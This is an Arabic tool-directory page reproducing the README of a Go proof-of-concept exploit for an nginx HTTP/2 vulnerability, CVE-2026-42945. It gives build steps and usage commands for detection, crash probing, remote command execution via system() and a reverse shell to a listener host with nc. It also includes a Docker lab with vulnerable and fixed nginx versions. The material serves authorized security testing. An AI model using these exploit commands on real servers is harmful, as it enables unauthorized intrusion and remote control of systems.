Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-42945 — أداة PoC مبنية على Go لـ CVE-2026-42945 (nginx HTTP/2) مع إمكانيات الكشف، فحص التعطل، تنفيذ الأوامر، والقشرة العكسية في بيئات مصرح بها. | Kitploit
أدوات/GitHubGitHub/redcrazyghost/cve-2026-42945
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالاختبار العشوائياختبار الاختراقاستغلال الملفات الثنائية
GitHubredcrazyghost/cve-2026-42945

CVE-2026-42945

أداة PoC مبنية على Go لـ CVE-2026-42945 (nginx HTTP/2) مع إمكانيات الكشف، فحص التعطل، تنفيذ الأوامر، والقشرة العكسية في بيئات مصرح بها.

عرض المستودع
1منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-42945 PoC (Go)

الصينية | English

أداة مساعدة للكشف والاستغلال لـ تنفيذ nginx HTTP/2 (CVE-2026-42945)، تُستخدم للتحقق من وجود الثغرة في بيئة مرخصة، ومقارنة تأثير التصحيحات، وإعادة إنتاج سلوك PoC في بيئة تجريبية مسيطر عليها.

الإصدارات المتأثرة (تقدير أولي): nginx 0.6.27 – 1.30.0؛ تم إصلاحها في 1.30.1+ / 1.31.0+.


⚠️ إخلاء المسؤولية (يرجى القراءة بدقة)

هذا المستودع مخصص فقط للبحث الأمني، والتحقق من الثغرات، والاختبار الدفاعي.

  1. التفويض القانوني: يمكنك استخدام هذه الأداة فقط على الأنظمة التي لديك إذن كتابي صريح بها أو التي تملكها بالكامل. مسح أو كشف أو مهاجمة شبكة/خادم شخص آخر دون إذن يُعد عملاً غير قانوني، ولا يتحمل المؤلف والمساهمون أي مسؤولية قانونية.
  2. المخاطر على مسؤوليتك: قد يؤدي الاستغلال إلى تعطل worker الخدمة المستهدفة، أو انقطاع الأعمال، أو تلف البيانات. يجب عليك تقييم التأثير بنفسك والتحقق أولاً في بيئة معزولة.
  3. بدون ضمان: هذه الأداة مُقدمة «كما هي»، لا نضمن نجاح الاستغلال في أي بيئة إنتاج حقيقية؛ نتائج القناة الجانبية لا تعني تحقيق RCE، يجب التحقق بشكل مستقل عن طريق كتابة ملفات، رجوع أوامر، أو شل عكسي إلخ.
  4. حظر إساءة الاستخدام: يُحظر استخدام هذه الأداة لاختراق أنظمة غير مصرح بها، أو الابتزاز، أو التخريب، أو التعدين، أو أي أغراض غير قانونية. تنزيل أو بناء أو استخدام الأداة يعني أنك قد قرأت ووافقت على هذا الإخلاء.
  5. لا علاقة له بمؤسسة NGINX الرسمية: هذا المشروع هو تنفيذ بحث مستقل ولا يمثل موقف NGINX الرسمي أو أي بائع آخر.

إذا كنت لا توافق على الشروط المذكورة أعلاه، فيرجى التوقف عن الاستخدام فورًا وحذف هذا المستودع.


نظرة عامة على الوظائف


المتطلبات البيئية

  • Go ≥ 1.26 (انظر go.mod)
  • اختياري: Docker + docker compose (بيئة تجريبية محلية)
  • اختياري: make، golangci-lint (تطوير/فحص الكود)
  • التحقق من الاستغلال: يجب أن يعرض الهدف نقاط نهاية PoC المطلوبة (GET /api/، POST /spray إلخ)؛ تم تضمين صور Docker التجريبية بالفعل

القيود والبيئات المناسبة


البناء

root@kitploit:~
# بناء سريع (الإخراج إلى bin/، تم تجاهله بواسطة .gitignore)
make build-cmd

# أو استخدم go مباشرة
go build -o ./bin/cve-2026-42945 ./cmd

# عرض الإصدار المضمن
./bin/cve-2026-42945 -version

الملفات الثنائية للإصدار: قم بتنزيل cve-2026-42945-<os>-<arch> المناسب لمنصتك من Releases (يتم بناؤها تلقائيًا بواسطة GitHub Actions بعد دفع وسم v*).


دليل الاستخدام

وسائط سطر الأوامر

root@kitploit:~
-target string      الهدف IP/اسم المضيف (افتراضي 127.0.0.1)
-port int           منفذ الهدف (0=80؛ إصدار Docker الثغري غالبًا 19321)
-docker             اختبار بيئة Docker التجريبية المحلية (vuln:19321, fixed:19331)
-check-only         كشف فقط، لا ترسل حركة استغلال
-probe-crash        فحص تجاوز + قناة جانبية لتعطل worker
-cmd string         أمر يتم تنفيذه عبر system()
-shell              شل عكسي (يتطلب -lhost)
-lhost string       IP المحلي للشل العكسي
-lport int          المنفذ المحلي للشل العكسي (افتراضي 4444)
-docker-profile     استخدام deploy/docker لقياس عنوان heap/libc الفعلي
-heap-base string   عنوان قاعدة heap (ست عشري، مثل 0x555555659000)
-libc-base string   عنوان قاعدة libc (ست عشري)
-tries int          عدد المحاولات لكل مرشح heap (افتراضي 10)
-timeout int        مهلة HTTP بالثواني (افتراضي 5)
-v                  إخراج مفصل
-version            عرض الإصدار والخروج

وضع -docker لا يمكن استخدامه مع -cmd / -shell؛ للاستغلال ضد هدف واحد، حدد -port 19321.

1. كشف الهدف فقط

root@kitploit:~
./bin/cve-2026-42945 -target 192.168.1.10 -port 80 -check-only

2. قناة جانبية للتعطل (هدف واحد)

root@kitploit:~
./bin/cve-2026-42945 -port 19321 -probe-crash -v

3. مقارنة بيئة Docker التجريبية

ابدأ حاويات التجربة أولاً:

root@kitploit:~
make docker-up
# أو
docker compose -f deploy/docker-compose.yml up -d --build

البناء الأولي يتطلب تجميع nginx، قد يستغرق عدة دقائق؛ بعد أن تصبح الخدمات healthy في docker compose ps، قم بتشغيل make test-lab.

الخدمةالمنفذالوصف
vuln19321nginx 1.30.0 (متأثر)
fixed19331nginx 1.30.1 (مُصلَح)

اختبار الدفعة:

root@kitploit:~
./bin/cve-2026-42945 -docker -check-only
./bin/cve-2026-42945 -docker -probe-crash

أو استخدم أهداف Makefile السريعة:

root@kitploit:~
make test-lab          # فحص + استكشاف
make cmd-exploit       # كتابة /tmp/pwned على vuln وطلب التحقق من الأمر

4. تنفيذ أمر على vuln (التحقق من RCE)

تكون حاويات التجربة ذات أعلى معدل نجاح عندما يكون ASLR معطلاً (setarch -R) ويتم استخدام -docker-profile مع العناوين الأساسية المحددة مسبقًا:

root@kitploit:~
./bin/cve-2026-42945 -port 19321 -docker-profile \
  -cmd 'echo pwned > /tmp/pwned' -v

# التحقق من كتابة الملف
docker exec nginx-rift-vuln-1.30.0 cat /tmp/pwned

5. شل عكسي

root@kitploit:~
# المحطة 1: تشغيل الأداة (ستحاول الاستماع عبر nc في الخلفية)
./bin/cve-2026-42945 -port 19321 -docker-profile -shell -lhost 10.0.0.5 -lport 4444 -v

# إذا لم يتم العثور على nc، افتح محطة أخرى واستمع يدويًا:
nc -lvnp 4444

6. تخطيط الذاكرة المخصص

عندما يختلف ASLR الهدف الحقيقي وإصدار libc عن Docker، يجب كشف أو تخمين العناوين الأساسية بنفسك:

root@kitploit:~
./bin/cve-2026-42945 -target TARGET -port 8080 \
  -heap-base 0x555555659000 \
  -libc-base 0x7ffff77ba000 \
  -cmd 'id' -tries 20 -v

تفسير النتائج

  • [+] قناة جانبية: worker غير طبيعي: يشير فقط إلى أن worker قد تعطل بسبب تجاوز، لا يمكن استخدامه بمفرده كدليل على نجاح RCE.
  • يجب التحقق الثانوي: فحص الآثار الجانبية للأمر (ملفات، عمليات، docker exec إلخ).
  • أسباب الفشل الشائعة: تفعيل ASLR، خطأ في إزاحة libc/الكومة، نقاط نهاية PoC غير متاحة، WAF/تحديد السرعة، الحاويات تحتاج إلى إعادة تشغيل.

هيكل المشروع

root@kitploit:~
cmd/                 نقطة الدخول الرئيسية
internal/rift/       منطق الكشف، بناء الحمولة، والاستغلال
deploy/docker/       صور تجريبية nginx 1.30.0 / 1.30.1
deploy/docker-compose.yml
.github/workflows/   بناء الإصدارات لمنصات متعددة

التطوير

root@kitploit:~
make help            # عرض جميع أهداف make
make test            # اختبارات الوحدة
make lint            # golangci-lint
make version         # عرض رقم إصدار البناء الحالي

نشر إصدار جديد:

root@kitploit:~
git tag v1.0.0
git push origin v1.0.0

المراجع

  • المستودع: https://github.com/RedCrazyGhost/CVE-2026-42945
  • CVE: CVE-2026-42945 (ثغرة متعلقة بـ nginx HTTP/2، يرجى الرجوع إلى الإعلان الرسمي)
  • الترخيص: MIT License
  • الأمان: SECURITY.md

تذكير مرة أخرى

استخدم هذه الأداة فقط على الأنظمة التي لديك الحق في اختبارها. أي إساءة استخدام لا علاقة لها بالمؤلف.

تنزيل الأداة
الوضعالوصف
-check-onlyالاتصالات، رأس Server، تقدير أولي للإصدار، كشف نقاط نهاية PoC
-probe-crashإرسال جولة فحص تجاوز، الحكم من خلال قناة جانبية لتعطل worker
-cmdبناء حمولة exploit، تنفيذ الأمر المحدد عبر system()
-shellشل عكسي (يتطلب -lhost، الجهاز المحلي يحتاج nc)
-dockerاختبار دفعة لبيئة Docker التجريبية المحلية (vuln / fixed)
العنصرالوصف
البروتوكوليدعم فقط HTTP النصي (net.Dial + بايتات HTTP أولية)، لا يدعم HTTPS/TLS. بالنسبة لمنافذ TLS مثل -port 443، يلزم إنهاء TLS مسبقًا أو استخدام منفذ HTTP.
تجربة Dockerالصورة هي linux/amd64، أول مرة docker compose build تتطلب تجميع nginx من المصدر، قد يستغرق وقتًا طويلاً؛ داخل الحاوية يستخدم setarch -R لإيقاف ASLR، مما يختلف كثيرًا عن بيئة الإنتاج.
Apple SiliconDocker المحلي يعمل عبر المحاكاة باستخدام platform: linux/amd64، بطيء.
شل عكسي-shell يعتمد على nc النظام، يُوصى بالمراقبة اليدوية على Windows.
حكم الاستغلالالقناة الجانبية (تعطل worker) لا تعني RCE، يجب التحقق المستقل من الآثار الجانبية للأوامر.